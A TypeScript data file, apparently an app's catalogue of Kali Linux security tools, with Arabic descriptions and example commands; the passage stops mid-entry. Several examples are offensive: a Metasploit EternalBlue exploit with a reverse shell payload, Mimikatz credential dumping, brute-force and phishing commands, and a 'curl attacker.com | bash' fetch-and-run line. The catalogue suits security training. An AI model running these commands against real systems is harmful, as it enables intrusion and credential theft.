// Comprehensive Kali Linux tools database
// Each tool: { name, category, description, command, examples, tags, popularity }

export interface KaliToolData {
  name: string
  category: string
  description: string
  command: string
  examples: string
  tags: string
  popularity: number
}

export const kaliTools: KaliToolData[] = [
  // ============ Information Gathering ============
  {
    name: "Nmap",
    category: "Information Gathering",
    description: "أداة استكشاف الشبكات الأكثر شعبية. تُستخدم لمسح الشبكات، اكتشاف الأجهزة، تحديد المنافذ المفتوحة، الخدمات والإصدارات، وأنظمة التشغيل. تعتبر الأساس لأي تقييم أمني للشبكات.",
    command: "nmap [options] <target>",
    examples: "nmap -sV -sC 192.168.1.1\nnmap -A -T4 scanme.nmap.org\nnmap -sn 192.168.1.0/24\nnmap -p- --open 10.10.10.5\nnmap --script vuln 192.168.1.1",
    tags: "network,scan,ports,recon,discovery",
    popularity: 99,
  },
  {
    name: "Recon-ng",
    category: "Information Gathering",
    description: "إطار عمل شامل لجمع المعلومات من مصادر الويب المفتوحة (OSINT). يدعم الوحدات النمطية لاستكشاف النطاقات، البريد الإلكتروني، وأسماء المستخدمين.",
    command: "recon-ng",
    examples: "recon-ng\nmarketplace install all\nmodules search\ndomains-hosts google_site_web",
    tags: "osint,recon,domain,web",
    popularity: 75,
  },
  {
    name: "Maltego",
    category: "Information Gathering",
    description: "أداة تحليل العلاقات الرسومية لجمع المعلومات وربط البيانات بين الكيانات المختلفة مثل النطاقات، عناوين IP، والأشخاص.",
    command: "maltego",
    examples: "maltego\n# واجهة رسومية لتحليل العلاقات",
    tags: "osint,graph,visualization",
    popularity: 70,
  },
  {
    name: "SpiderFoot",
    category: "Information Gathering",
    description: "أداة أتمتة لجمع المعلومات تستكشف أكثر من 100 مصدر بيانات عامة لربط المعلومات حول هدف معين.",
    command: "spiderfoot -s <target>",
    examples: "spiderfoot -s example.com -t INTERNET_NAME\nspiderfoot -l 127.0.0.1:5001",
    tags: "osint,automation,recon",
    popularity: 65,
  },
  {
    name: "theHarvester",
    category: "Information Gathering",
    description: "أداة لجلب رسائل البريد الإلكتروني، النطاقات الفرعية، والمضيفين من مصادر متعددة مثل محركات البحث وقواعد بيانات PTR.",
    command: "theHarvester -d <domain> -l <limit> -b <source>",
    examples: "theHarvester -d example.com -l 500 -b google\ntheHarvester -d target.org -b all",
    tags: "osint,email,subdomain",
    popularity: 78,
  },
  {
    name: "Shodan",
    category: "Information Gathering",
    description: "محرك بحث لأجهزة الإنترنت (IoT). يبحث في بيانات الـ Banner الخاصة بالخدمات المتصلة بالإنترنت حول العالم.",
    command: "shodan search <query>",
    examples: "shodan search apache country:US\nshodan host 8.8.8.8\nshodan stats --facets port apache",
    tags: "iot,search,scan",
    popularity: 82,
  },
  {
    name: "Masscan",
    category: "Information Gathering",
    description: "أسرع أداة مسح للمنافذ على الإنترنت. يمكنها مسح الإنترنت بأكمله في أقل من 6 دقائق، تنبعث منها 10 ملايين حزمة في الثانية.",
    command: "masscan -p<ports> <target> --rate=<rate>",
    examples: "masscan -p1-65535 10.0.0.0/8 --rate=10000\nmasscan -p80,443 192.168.0.0/16",
    tags: "network,scan,fast,ports",
    popularity: 85,
  },
  {
    name: "Enum4linux",
    category: "Information Gathering",
    description: "أداة لاستكشاف معلومات Windows و Samba عبر بروتوكول SMB. تستخرج المستخدمين، المشاركات، والمجموعات.",
    command: "enum4linux <target>",
    examples: "enum4linux -a 192.168.1.10\nenum4linux -U -S 10.10.10.5",
    tags: "smb,windows,enum",
    popularity: 68,
  },
  {
    name: "DNSenum",
    category: "Information Gathering",
    description: "أداة استكشاف DNS متعددة المراحل. تجمع النطاقات الفرعية، تقوم بـ zone transfer، وتستخرج عناوين IP.",
    command: "dnsenum <domain>",
    examples: "dnsenum example.com\ndnsenum --enum target.org",
    tags: "dns,subdomain,enum",
    popularity: 72,
  },
  {
    name: "Sublist3r",
    category: "Information Gathering",
    description: "أداة استكشاف النطاقات الفرعية باستخدام محركات البحث ومصادر الطرف الثالث. سريعة وفعالة لجمع النطاقات الفرعية.",
    command: "sublist3r -d <domain>",
    examples: "sublist3r -d example.com\nsublist3r -d target.org -t 50 -v",
    tags: "subdomain,recon,dns",
    popularity: 76,
  },

  // ============ Vulnerability Analysis ============
  {
    name: "Nikto",
    category: "Vulnerability Analysis",
    description: "ماسح ثغرات خوادم الويب. يفحص أكثر من 6700 ملف/برنامج خطير، ويتحقق من الإصدارات القديمة من أكثر من 270 خادم.",
    command: "nikto -h <target>",
    examples: "nikto -h http://example.com\nnikto -h 192.168.1.1 -p 80,443\nnikto -h https://target.com -ssl",
    tags: "web,vuln,scan",
    popularity: 88,
  },
  {
    name: "Nessus",
    category: "Vulnerability Analysis",
    description: "ماسح ثغرات تجاري قوي. يفحص الشبكات عن الثغرات الأمنية المعروفة ويصدر تقارير مفصلة.",
    command: "nessuscli",
    examples: "# واجهة ويب على https://localhost:8834\nnessuscli fetch --register <code>",
    tags: "vuln,scan,enterprise",
    popularity: 80,
  },
  {
    name: "OpenVAS",
    category: "Vulnerability Analysis",
    description: "إطار عمل مفتوح المصدر لتقييم الثغرات. بديل مجاني لـ Nessus مع قاعدة بيانات شاملة للثغرات.",
    command: "openvas-start",
    examples: "gvm-start\n# واجهة ويب على https://127.0.0.1:9392",
    tags: "vuln,scan,open-source",
    popularity: 73,
  },
  {
    name: "Legion",
    category: "Vulnerability Analysis",
    description: "أداة فحص ومسح شبه تلقائي مع واجهة رسومية. تجمع بين Nmap و Nikto وأدوات أخرى في واجهة واحدة.",
    command: "legion",
    examples: "legion\n# واجهة رسومية",
    tags: "gui,scan,auto",
    popularity: 55,
  },
  {
    name: "Nipper-ng",
    category: "Vulnerability Analysis",
    description: "أداة تدقيق أمني لتهيئة أجهزة الشبكة مثل الراوترات والـ Firewalls. تحلل ملفات الإعداد وتجد نقاط الضعف.",
    command: "nipper-ng --input=<file>",
    examples: "nipper-ng --input=config.txt --output=report.html",
    tags: "firewall,config,audit",
    popularity: 45,
  },
  {
    name: "Unix-privesc-check",
    category: "Vulnerability Analysis",
    description: "أداة تبحث عن مشاكل تصعيد الصلاحيات على أنظمة Unix/Linux. تفحص ملفات الإعداد والأذونات.",
    command: "unix-privesc-check <mode>",
    examples: "unix-privesc-check standard\nunix-privesc-check detailed",
    tags: "privesc,linux,unix",
    popularity: 58,
  },

  // ============ Web Application Analysis ============
  {
    name: "Burp Suite",
    category: "Web Application Analysis",
    description: "أداة احترافية لاختبار اختراق تطبيقات الويب. توفر proxy للتدخل في الطلبات، repeater، intruder، و scanner.",
    command: "burpsuite",
    examples: "burpsuite\n# واجهة رسومية - ضبط المتصفح على 127.0.0.1:8080",
    tags: "web,proxy,scanner",
    popularity: 95,
  },
  {
    name: "OWASP ZAP",
    category: "Web Application Analysis",
    description: "Zed Attack Proxy - ماسح ثغرات تطبيقات الويب مفتوح المصدر من OWASP. بديل مجاني لـ Burp Suite.",
    command: "zap",
    examples: "zap\nzap-cli quick-scan http://example.com\nzap-cli active-scan http://target.com",
    tags: "web,proxy,owasp",
    popularity: 86,
  },
  {
    name: "SQLmap",
    category: "Web Application Analysis",
    description: "أداة تلقائية لاكتشاف واستغلال ثغرات SQL Injection. تدعم أنواع عديدة من قواعد البيانات وتقنيات الحقن.",
    command: "sqlmap -u <url> [options]",
    examples: "sqlmap -u 'http://example.com/page?id=1' --dbs\nsqlmap -u 'http://target.com/login' --data='user=admin&pass=1' --dump\nsqlmap -u <url> --os-shell",
    tags: "sql-injection,web,exploit",
    popularity: 92,
  },
  {
    name: "WPScan",
    category: "Web Application Analysis",
    description: "ماسح ثغرات WordPress. يفحص الإصدارات، الإضافات، والقوالب للبحث عن الثغرات المعروفة.",
    command: "wpscan --url <url> [options]",
    examples: "wpscan --url http://example.com --enumerate u\nwpscan --url https://target.com --enumerate vp --api-token <token>",
    tags: "wordpress,web,scan",
    popularity: 84,
  },
  {
    name: "Dirb",
    category: "Web Application Analysis",
    description: "أداة لاكتشاف الملفات والمجلدات المخفية على خوادم الويب باستخدام قوائم الكلمات.",
    command: "dirb <url> [wordlist]",
    examples: "dirb http://example.com\ndirb http://target.com /usr/share/wordlists/dirb/big.txt",
    tags: "web,directory,bruteforce",
    popularity: 79,
  },
  {
    name: "Gobuster",
    category: "Web Application Analysis",
    description: "أداة سريعة لاكتشاف المجلدات، الملفات، والنطاقات الفرعية مكتوبة بلغة Go.",
    command: "gobuster <mode> -u <url> -w <wordlist>",
    examples: "gobuster dir -u http://example.com -w wordlist.txt\ngobuster dns -d example.com -w subdomains.txt\ngobuster vhost -u http://target.com -w hosts.txt",
    tags: "web,directory,dns",
    popularity: 87,
  },
  {
    name: "ffuf",
    category: "Web Application Analysis",
    description: "أداة fuzz سريعة مكتوبة بلغة Go. تُستخدم لاكتشاف المحتوى المخفي، الـ vhosts، واختبار المعاملات.",
    command: "ffuf -u <url> -w <wordlist>",
    examples: "ffuf -u http://example.com/FUZZ -w wordlist.txt\nffuf -u http://target.com/?FUZZ=test -w params.txt\nffuf -u http://target.com -H 'Host: FUZZ.target.com' -w vhosts.txt",
    tags: "web,fuzz,discovery",
    popularity: 83,
  },
  {
    name: "WhatWeb",
    category: "Web Application Analysis",
    description: "أداة تحدد تقنيات الويب المستخدمة في الموقع مثل CMS، لغات البرمجة، خوادم الويب، وأدوات التحليلات.",
    command: "whatweb <url>",
    examples: "whatweb example.com\nwhatweb -a 3 https://target.com",
    tags: "web,fingerprint,tech",
    popularity: 71,
  },
  {
    name: "Commix",
    category: "Web Application Analysis",
    description: "أداة اختبار تلقائية لثغرات Command Injection في تطبيقات الويب.",
    command: "commix --url=<url>",
    examples: "commix --url='http://example.com/cmd.php?host=localhost'\ncommix --url='http://target.com' --data='cmd=ls'",
    tags: "web,command-injection",
    popularity: 56,
  },

  // ============ Password Attacks ============
  {
    name: "John the Ripper",
    category: "Password Attacks",
    description: "أداة كسر كلمات المرور الشهيرة. تدعم أنواع تشفير عديدة ويمكنها استخدام قواعد لتسريع الكسر.",
    command: "john [options] <file>",
    examples: "john hashes.txt\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\njohn --show hashes.txt\njohn --format=raw-sha512 hash.txt",
    tags: "password,crack,hash",
    popularity: 90,
  },
  {
    name: "Hashcat",
    category: "Password Attacks",
    description: "أسرع أداة كسر كلمات مرور في العالم. تستخدم تسريير الـ GPU لكسر التشفير بسرعات هائلة.",
    command: "hashcat [options] <hash> <wordlist>",
    examples: "hashcat -m 0 hashes.txt wordlist.txt\nhashcat -m 1000 -a 0 ntlm.txt rockyou.txt\nhashcat -m 2500 wpa.hccapx wordlist.txt",
    tags: "password,gpu,crack",
    popularity: 91,
  },
  {
    name: "Hydra",
    category: "Password Attacks",
    description: "أداة هجمات brute-force سريعة تدعم أكثر من 50 بروتوكول (SSH, FTP, HTTP, SMB...).",
    command: "hydra -l <user> -P <passlist> <target> <service>",
    examples: "hydra -l admin -P rockyou.txt ssh://192.168.1.10\nhydra -L users.txt -P pass.txt ftp://10.10.10.5\nhydra -l admin -P pass.txt http-post-form '/login:user=^USER^&pass=^PASS^:F=incorrect'",
    tags: "bruteforce,password,online",
    popularity: 89,
  },
  {
    name: "Crunch",
    category: "Password Attacks",
    description: "أداة توليد قوائم كلمات مخصصة حسب معايير محددة (طول، أحرف، أنماط).",
    command: "crunch <min> <max> [charset] -o <file>",
    examples: "crunch 8 8 -o wordlist.txt\ncrunch 6 8 abc123 -o passwords.txt\ncrunch 4 4 -t pass@ -o list.txt",
    tags: "wordlist,generate,password",
    popularity: 74,
  },
  {
    name: "Medusa",
    category: "Password Attacks",
    description: "أداة brute-force متوازية وسريعة تشبه Hydra. تدعم بروتوكولات متعددة.",
    command: "medusa -h <host> -u <user> -P <passlist> -M <module>",
    examples: "medusa -h 192.168.1.10 -u admin -P pass.txt -M ssh\nmedusa -h 10.10.10.5 -U users.txt -P pass.txt -M ftp",
    tags: "bruteforce,password,parallel",
    popularity: 67,
  },
  {
    name: "Cewl",
    category: "Password Attacks",
    description: "أداة تولد قوائم كلمات مخصصة من خلال زحف موقع ويب واستخراج الكلمات منه.",
    command: "cewl <url> -w <output>",
    examples: "cewl http://example.com -w wordlist.txt\ncewl -d 3 -m 5 http://target.com -w pass.txt",
    tags: "wordlist,scrape,password",
    popularity: 62,
  },
  {
    name: "Hashid",
    category: "Password Attacks",
    description: "أداة تحدد نوع الـ hash من خلال تحليل نمطه. تساعد في اختيار الـ mode الصحيح لـ Hashcat.",
    command: "hashid <hash>",
    examples: "hashid '5f4dcc3b5aa765d61d8327deb882cf99'\nhashid -m '$6$...'",
    tags: "hash,identify,password",
    popularity: 60,
  },

  // ============ Wireless Attacks ============
  {
    name: "Aircrack-ng",
    category: "Wireless Attacks",
    description: "مجموعة أدوات لمراقبة وتحليل واختبار اختراق شبكات WiFi. تتضمن airodump-ng, aireplay-ng, aircrack-ng.",
    command: "aircrack-ng [options] <capture>",
    examples: "airmon-ng start wlan0\nairodump-ng wlan0mon\nairodump-ng -c 1 -bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon\naireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon\naircrack-ng -w wordlist.txt cap-01.cap",
    tags: "wifi,wpa,crack",
    popularity: 93,
  },
  {
    name: "Wifite",
    category: "Wireless Attacks",
    description: "أداة آلية لاختبار اختراق شبكات WiFi. تجمع بين أدوات aircrack-ng و reaver في واجهة واحدة.",
    command: "wifite",
    examples: "wifite\nwifite --kill --dict wordlist.txt\nwifite --deps",
    tags: "wifi,automation,wpa",
    popularity: 77,
  },
  {
    name: "Reaver",
    category: "Wireless Attacks",
    description: "أداة هجوم brute-force على WPS (WiFi Protected Setup). تستغل الثغرة في إعداد PIN.",
    command: "reaver -i <interface> -b <bssid>",
    examples: "reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF\nreaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vvv -K 1",
    tags: "wifi,wps,bruteforce",
    popularity: 72,
  },
  {
    name: "Kismet",
    category: "Wireless Attacks",
    description: "ماسح شبكات لاسلكية يكتشف الشبكات المخفية ويلتزم بوضع الاستنشاق بدون إرسال حزم.",
    command: "kismet",
    examples: "kismet\n# واجهة نصية أو رسومية لاكتشاف الشبكات",
    tags: "wifi,scanner,passive",
    popularity: 64,
  },
  {
    name: "Fern WiFi Cracker",
    category: "Wireless Attacks",
    description: "أداة اختبار اختراق WiFi مع واجهة رسومية. تدعم WEP, WPA, WPS.",
    command: "fern-wifi-cracker",
    examples: "fern-wifi-cracker\n# واجهة رسومية",
    tags: "wifi,gui,crack",
    popularity: 61,
  },
  {
    name: "Bully",
    category: "Wireless Attacks",
    description: "أداة بديلة لـ Reaver لاختراق WPS. مكتوبة بلغة C وأكثر استقراراً.",
    command: "bully <interface> -b <bssid>",
    examples: "bully wlan0mon -b AA:BB:CC:DD:EE:FF\nbully -d wlan0mon -b AA:BB:CC:DD:EE:FF",
    tags: "wifi,wps,bruteforce",
    popularity: 50,
  },

  // ============ Exploitation Tools ============
  {
    name: "Metasploit Framework",
    category: "Exploitation Tools",
    description: "إطار العمل الأشهر لاختبار الاختراق. يحتوي على آلاف الـ exploits، payloads، و auxiliary modules.",
    command: "msfconsole",
    examples: "msfconsole\nuse exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS 192.168.1.10\nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nset LHOST 192.168.1.5\nexploit",
    tags: "exploit,framework,payload",
    popularity: 98,
  },
  {
    name: "SearchSploit",
    category: "Exploitation Tools",
    description: "أداة البحث في قاعدة بيانات Exploit-DB محلياً. تبحث عن exploits لأي خدمة أو إصدار.",
    command: "searchsploit <query>",
    examples: "searchsploit apache 2.4\nsearchsploit -m 12345\nsearchsploit -x 12345\nsearchsploit -p 'Windows 10'",
    tags: "exploit,search,db",
    popularity: 84,
  },
  {
    name: "BeEF",
    category: "Exploitation Tools",
    description: "Browser Exploitation Framework. يركز على استغلال ثغرات متصفح الويب واختبار أمان العميل.",
    command: "beef-xss",
    examples: "beef-xss\n# واجهة ويب على http://127.0.0.1:3000",
    tags: "browser,xss,exploit",
    popularity: 70,
  },
  {
    name: "Sqlninja",
    category: "Exploitation Tools",
    description: "أداة متخصصة لاستغلال SQL Injection على خوادم Microsoft SQL Server.",
    command: "sqlninja",
    examples: "sqlninja -m test\nsqlninja -m fingerprint",
    tags: "sql-injection,mssql,exploit",
    popularity: 40,
  },
  {
    name: "Commix (Exploit)",
    category: "Exploitation Tools",
    description: "أداة استغلال command injection في تطبيقات الويب. تجد وتستغل الثغرات تلقائياً.",
    command: "commix --url=<url>",
    examples: "commix --url='http://example.com/ping?host=localhost' --batch",
    tags: "command-injection,web,exploit",
    popularity: 55,
  },
  {
    name: "ExploitDB",
    category: "Exploitation Tools",
    description: "قاعدة بيانات شاملة للـ exploits العامة. تأتي مع Kali Linux بشكل افتراضي.",
    command: "searchsploit",
    examples: "searchsploit -u\nsearchsploit 'Windows Privilege Escalation'\nsearchsploit -t 'apache'",
    tags: "exploit,db,offline",
    popularity: 80,
  },

  // ============ Sniffing & Spoofing ============
  {
    name: "Wireshark",
    category: "Sniffing & Spoofing",
    description: "محلل الحزم الشبكية الأشهر. واجهة رسومية لمراقبة وتحليل حركة المرور في الوقت الحقيقي.",
    command: "wireshark",
    examples: "wireshark\n# واجهة رسومية\ntshark -i eth0 -f 'port 80'\ntshark -i eth0 -Y 'http.request'",
    tags: "sniff,analyze,network",
    popularity: 96,
  },
  {
    name: "tcpdump",
    category: "Sniffing & Spoofing",
    description: "أداة التقاط حزم الشبكة من سطر الأوامر. خفيفة وقوية بدون واجهة رسومية.",
    command: "tcpdump -i <interface> [options]",
    examples: "tcpdump -i eth0\ntcpdump -i eth0 port 80\ntcpdump -i eth0 -w capture.pcap\ntcpdump -nn -r capture.pcap",
    tags: "sniff,capture,network",
    popularity: 88,
  },
  {
    name: "Ettercap",
    category: "Sniffing & Spoofing",
    description: "مجموعة أدوات لـ man-in-the-middle attacks، ARP spoofing، و L7 protocol manipulation.",
    command: "ettercap -G",
    examples: "ettercap -G\n# واجهة رسومية\nettercap -T -M arp /192.168.1.1// /192.168.1.10//",
    tags: "mitm,arp,spoof",
    popularity: 79,
  },
  {
    name: "Bettercap",
    category: "Sniffing & Spoofing",
    description: "بديل حديث لـ Ettercap. أداة قوية ومرنة لـ MITM، الـ spoofing، واستنشاق الشبكات.",
    command: "bettercap -iface <interface>",
    examples: "bettercap -iface eth0\n# داخل bettercap:\n# net.probe on\n# set arp.spoof.targets 192.168.1.10\n# arp.spoof on\n# net.sniff on",
    tags: "mitm,spoof,modern",
    popularity: 82,
  },
  {
    name: "Responder",
    category: "Sniffing & Spoofing",
    description: "أداة LLMNR/NBT-NS/MDNS poisoner. تلتقط تجاوزات المصادقة وتستخرج الـ hashes.",
    command: "responder -I <interface>",
    examples: "responder -I eth0 -wrf\nresponder -I eth0 -A",
    tags: "llmnr,poison,ntlm",
    popularity: 81,
  },
  {
    name: "Macchanger",
    category: "Sniffing & Spoofing",
    description: "أداة لتغيير عنوان MAC لبطاقة الشبكة. مفيدة لإخفاء الهوية وتجاوز فلتر MAC.",
    command: "macchanger [options] <interface>",
    examples: "macchanger -r eth0\nmacchanger -m AA:BB:CC:DD:EE:FF wlan0\nmacchanger -s eth0",
    tags: "mac,spoof,anon",
    popularity: 66,
  },

  // ============ Post Exploitation ============
  {
    name: "Meterpreter",
    category: "Post Exploitation",
    description: "الـ payload المتقدم من Metasploit. يعمل في الذاكرة ويوفر تحكم كامل بالنظام المخترق.",
    command: "meterpreter >",
    examples: "meterpreter > sysinfo\nmeterpreter > getuid\nmeterpreter > hashdump\nmeterpreter > shell\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.5",
    tags: "post-exploit,payload,meterpreter",
    popularity: 90,
  },
  {
    name: "Mimikatz",
    category: "Post Exploitation",
    description: "أداة استخراج كلمات المرور من ذاكرة LSASS على Windows. تستخرج NTLM hashes وكلمات المرور النصية.",
    command: "mimikatz",
    examples: "mimikatz # sekurlsa::logonpasswords\nmimikatz # lsadump::sam\nmimikatz # sekurlsa::tickets",
    tags: "windows,credentials,password",
    popularity: 87,
  },
  {
    name: "Empire",
    category: "Post Exploitation",
    description: "إطار عمل PowerShell لاختبار اختراق Windows. يدعم التحكم عن بعد والاستمرارية.",
    command: "powershell-empire",
    examples: "powershell-empire server\npowershell-empire client",
    tags: "windows,powershell,c2",
    popularity: 75,
  },
  {
    name: "LinPEAS",
    category: "Post Exploitation",
    description: "Linux Privilege Escalation Awesome Script. يفحص نظام Linux تلقائياً للبحث عن طرق تصعيد الصلاحيات.",
    command: "./linpeas.sh",
    examples: "curl http://attacker.com/linpeas.sh | bash\n./linpeas.sh -a all\n./linpeas.sh -s fast",
    tags: "privesc,linux,recon",
    popularity: 78,
  },
  {
    name: "WinPEAS",
    category: "Post Exploitation",
    description: "Windows Privilege Escalation Awesome Script. يفحص نظام Windows للبحث عن طرق تصعيد الصلاحيات.",
    command: "winpeas.exe",
    examples: "winpeas.exe\nwinpeas.bat\nwinpeasx64.exe",
    tags: "privesc,windows,recon",
    popularity: 76,
  },
  {
    name: "PSExec",
    category: "Post Exploitation",
    description: "أداة تنفيذ أوامر عن بعد على Windows عبر بروتوكول SMB. تتيح الوصول الكامل للنظام.",
    command: "psexec.py <user>:<pass>@<target>",
    examples: "psexec.py Administrator:Pass123@192.168.1.10\npsexec.py -hashes aad3b435:NTLMhash admin@10.10.10.5\nimpacket-psexec user:pass@target cmd.exe",
    tags: "windows,smb,remote",
    popularity: 80,
  },

  // ============ Forensics ============
  {
    name: "Autopsy",
    category: "Forensics",
    description: "منصة تحليل جنائي رقمي بواجهة رسومية. تستخدم لتحليل الأقراص والصور الجنائية.",
    command: "autopsy",
    examples: "autopsy\n# واجهة ويب على http://localhost:9999",
    tags: "forensics,disk,gui",
    popularity: 74,
  },
  {
    name: "Volatility",
    category: "Forensics",
    description: "إطار عمل لتحليل ذاكرة RAM. يستخرج العمليات، الاتصالات، ومفاتيح التشفير من صور الذاكرة.",
    command: "volatility -f <image> <plugin>",
    examples: "volatility -f memory.dmp imageinfo\nvolatility -f memory.dmp --profile=Win10x64 pslist\nvolatility -f memory.dmp --profile=Win10x64 netscan",
    tags: "forensics,memory,ram",
    popularity: 82,
  },
  {
    name: "Foremost",
    category: "Forensics",
    description: "أداة استعادة الملفات من صور الأقراص. تستخرج الملفات بناءً على رؤوسها وذيولها.",
    command: "foremost -i <image> -o <output>",
    examples: "foremost -i disk.img -o recovered/\nforemost -t jpg,png -i usb.dd",
    tags: "forensics,recovery,files",
    popularity: 65,
  },
  {
    name: "Binwalk",
    category: "Forensics",
    description: "أداة تحليل الملفات الثنائية. تبحث عن توقيعات الملفات المضمنة وتستخرجها.",
    command: "binwalk <file>",
    examples: "binwalk firmware.bin\nbinwalk -e firmware.bin\nbinwalk --dd='.*' image.jpg",
    tags: "forensics,firmware,extract",
    popularity: 73,
  },
  {
    name: "Scalpel",
    category: "Forensics",
    description: "أداة استعادة ملفات سريعة، بديل لـ Foremost مع أداء أفضل.",
    command: "scalpel -c <config> -i <image> -o <output>",
    examples: "scalpel -c /etc/scalpel/scalpel.conf -i disk.img -o output/",
    tags: "forensics,recovery,fast",
    popularity: 48,
  },
  {
    name: "Bulk_extractor",
    category: "Forensics",
    description: "أداة استخراج المعلومات الجنائية. تستخرج عناوين البريد، URL، وأرقام بطاقات الائتمان من الصور.",
    command: "bulk_extractor -o <output> <image>",
    examples: "bulk_extractor -o output/ disk.img\nbulk_extractor -f email -o out/ usb.dd",
    tags: "forensics,extract,email",
    popularity: 52,
  },

  // ============ Social Engineering ============
  {
    name: "Social Engineering Toolkit (SET)",
    category: "Social Engineering",
    description: "إطار عمل شامل لهندسة الاختراق الاجتماعي. يدعم phishing، هجمات payload، وclone المواقع.",
    command: "setoolkit",
    examples: "setoolkit\n# قائمة تفاعلية:\n# 1) Social-Engineering Attacks\n# 2) Website Attack Vectors\n# 3) Credential Harvester Attack",
    tags: "social-engineering,phishing,set",
    popularity: 81,
  },
  {
    name: "Maltego (SE)",
    category: "Social Engineering",
    description: "تحليل العلاقات الاجتماعية وجمع المعلومات عن الأشخاص من مصادر OSINT.",
    command: "maltego",
    examples: "maltego\n# واجهة رسومية لتحليل العلاقات",
    tags: "osint,social,graph",
    popularity: 60,
  },
  {
    name: "King Phisher",
    category: "Social Engineering",
    description: "أداة حملات phishing محاكاة. تُستخدم لتدريب المستخدمين على الوعي بالتصيد.",
    command: "king-phisher",
    examples: "king-phisher\n# واجهة رسومية لإدارة الحملات",
    tags: "phishing,campaign,simulation",
    popularity: 55,
  },
  {
    name: "MSFPC",
    category: "Social Engineering",
    description: "MSFvenom Payload Creator. يبسط إنشاء payloads خبيثة بأمر واحد.",
    command: "msfpc <type> <host> <port> [options]",
    examples: "msfpc windows 192.168.1.5 443\nmsfpc android 10.10.10.5 8080\nmsfpc python 192.168.1.5 4444",
    tags: "payload,msfvenom,social",
    popularity: 64,
  },
  {
    name: "Evilginx2",
    category: "Social Engineering",
    description: "إطار عمل MitM phishing يتجاوز المصادقة الثنائية (2FA) عبر proxy عكسي.",
    command: "evilginx",
    examples: "evilginx\n# داخل evilginx:\n# config domain example.com\n# phishlets get linkedin\n# lures create linkedin",
    tags: "phishing,2fa,mitm",
    popularity: 78,
  },

  // ============ Reporting ============
  {
    name: "Dradis",
    category: "Reporting",
    description: "إطار عمل تعاوني لإعداد تقارير الاختراق. يجمع النتائج من أدوات مختلفة في تقرير واحد.",
    command: "dradis",
    examples: "dradis start\n# واجهة ويب على http://localhost:3000",
    tags: "reporting,collaboration",
    popularity: 58,
  },
  {
    name: "Faraday",
    category: "Reporting",
    description: "IDE لاختبار الاختراق وإدارة البيانات. يوحد مخرجات الأدوات المختلفة.",
    command: "faraday-server",
    examples: "faraday-server\nfaraday-client",
    tags: "reporting,ide,management",
    popularity: 56,
  },
  {
    name: "CherryTree",
    category: "Reporting",
    description: "محرر ملاحظات هرمي. مفيد لتنظيم ملاحظات اختبار الاختراق وإعداد التقارير.",
    command: "cherrytree",
    examples: "cherrytree\n# واجهة رسومية لتنظيم الملاحظات",
    tags: "notes,reporting,organize",
    popularity: 62,
  },
  {
    name: "Pwndoc",
    category: "Reporting",
    description: "منصة ويب لإعداد تقارير اختبار الاختراق. تدعم القوالب والتعاون.",
    command: "pwndoc",
    examples: "# تشغيل عبر Docker\ndocker-compose up -d",
    tags: "reporting,web,templates",
    popularity: 50,
  },

  // ============ Stress Testing ============
  {
    name: "Slowloris",
    category: "Stress Testing",
    description: "أداة هجوم DoS منخفض النطاق. تستهدف خوادم الويب بفتح اتصالات بطيئة.",
    command: "slowloris <target>",
    examples: "slowloris example.com -p 80\nslowloris -i 10 -r 5000 -t 5 example.com",
    tags: "dos,slow,http",
    popularity: 68,
  },
  {
    name: "THC-Hydra (Stress)",
    category: "Stress Testing",
    description: "يمكن استخدام Hydra لهجمات brute-force على خدمات المصادقة (انظر Password Attacks).",
    command: "hydra",
    examples: "# يندرج تحت Password Attacks أيضاً",
    tags: "dos,bruteforce",
    popularity: 70,
  },
  {
    name: "DHCPig",
    category: "Stress Testing",
    description: "أداة هجوم DHCP exhaustion. تستنزف جميع عناوين IP المتاحة في الشبكة.",
    command: "dhcpig <interface>",
    examples: "dhcpig eth0\npig.py eth0 -x -t 50",
    tags: "dos,dhcp,exhaust",
    popularity: 45,
  },
  {
    name: "MACOF",
    category: "Stress Testing",
    description: "أداة من مجموعة dsniff. تغمر switch بعناوين MAC عشوائية لإجباره على التحويل لـ hub mode.",
    command: "macof",
    examples: "macof -i eth0\nmacof -n 1000 -i eth0",
    tags: "dos,mac,switch",
    popularity: 50,
  },

  // ============ Hardware ============
  {
    name: "Arduino IDE",
    category: "Hardware",
    description: "بيئة تطوير لبرمجة لوحات Arduino. مفيدة لإنشاء أجهزة هندسة اجتماعية مثل Rubber Ducky.",
    command: "arduino",
    examples: "arduino\n# واجهة رسومية للبرمجة",
    tags: "hardware,arduino,ide",
    popularity: 60,
  },
  {
    name: "Hak5 tools",
    category: "Hardware",
    description: "أدوات Hak5 الشهيرة مثل WiFi Pineapple، USB Rubber Ducky، و Bash Bunny.",
    command: "# أدوات Hak5",
    examples: "# توصيل الأجهزة وإدارتها عبر واجهاتها الخاصة",
    tags: "hardware,hak5,usb",
    popularity: 55,
  },
  {
    name: "Sigrok",
    category: "Hardware",
    description: "مجموعة برامج لتحليل الإشارات. تدعم logic analyzers و oscilloscopes.",
    command: "sigrok-cli",
    examples: "sigrok-cli --driver=fx2lafw --samples=1000\npulseview\n# واجهة رسومية",
    tags: "hardware,signal,analyzer",
    popularity: 40,
  },

  // ============ Reverse Engineering ============
  {
    name: "Ghidra",
    category: "Reverse Engineering",
    description: "أداة هندسة عكسية من NSA. تحليل binary، decompiler، وdisassembler بواجهة رسومية.",
    command: "ghidra",
    examples: "ghidra\n# واجهة رسومية لتحليل الملفات الثنائية",
    tags: "reverse,binary,decompile",
    popularity: 86,
  },
  {
    name: "Radare2",
    category: "Reverse Engineering",
    description: "إطار عمل هندسة عكسية مفتوح المصدر من سطر الأوامر. تحليل، تصحيح، وpatch للملفات الثنائية.",
    command: "r2 <binary>",
    examples: "r2 binary\n# داخل r2:\n# aaa - تحليل\n# pdf - عرض الـ main\n# V - وضع بصري\n# s main - القفز لـ main",
    tags: "reverse,binary,cli",
    popularity: 80,
  },
  {
    name: "IDA Free",
    category: "Reverse Engineering",
    description: "النسخة المجانية من IDA Pro. disassembler قوي لتحليل الملفات الثنائية.",
    command: "ida",
    examples: "ida\n# واجهة رسومية لتحليل binary",
    tags: "reverse,disasm,ida",
    popularity: 83,
  },
  {
    name: "Objdump",
    category: "Reverse Engineering",
